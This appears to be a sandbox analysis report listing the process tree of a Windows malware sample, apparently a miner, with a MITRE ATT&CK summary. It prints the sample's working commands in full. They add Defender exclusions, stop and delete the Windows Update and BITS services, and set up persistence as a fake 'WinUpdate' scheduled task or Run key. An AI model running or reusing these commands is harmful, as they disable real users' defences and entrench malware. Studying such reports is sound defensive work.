Command line: C:\Windows\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe (depth 2)
Command line: C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qoghxdvgd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WinUpdate' /tr '''C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WinUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WinUpdate" /t REG_SZ /f /d 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe' }
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe (depth 2)
Command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exe (depth 3)
Command line: sc stop UsoSvc
- Launches sc.exe
-
C:\Windows\System32\sc.exe (depth 3)
Command line: sc stop WaaSMedicSvc
- Launches sc.exe
-
C:\Windows\System32\sc.exe (depth 3)
Command line: sc stop wuauserv
- Launches sc.exe
-
C:\Windows\System32\sc.exe (depth 3)
Command line: sc stop bits
- Launches sc.exe
-
C:\Windows\System32\sc.exe (depth 3)
Command line: sc stop dosvc
- Launches sc.exe
-
C:\Windows\System32\reg.exe (depth 3)
Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
-
C:\Windows\System32\reg.exe (depth 3)
Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
-
C:\Windows\System32\reg.exe (depth 3)
Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#weslq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WinUpdate" } Else { "C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe" }2⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn WinUpdate3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qoghxdvgd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WinUpdate' /tr '''C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WinUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WinUpdate" /t REG_SZ /f /d 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe' }2⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ufwnctgi2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe nfwhyehyzpwozpzk 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2⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1396 -ip 13961⤵
-
C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe"C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Modify Existing Service (2)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
Defense Evasion
- Modify Registry (2)
- Virtualization/Sandbox Evasion (1)
- Impair Defenses (1)
- Scripting (1)
Downloads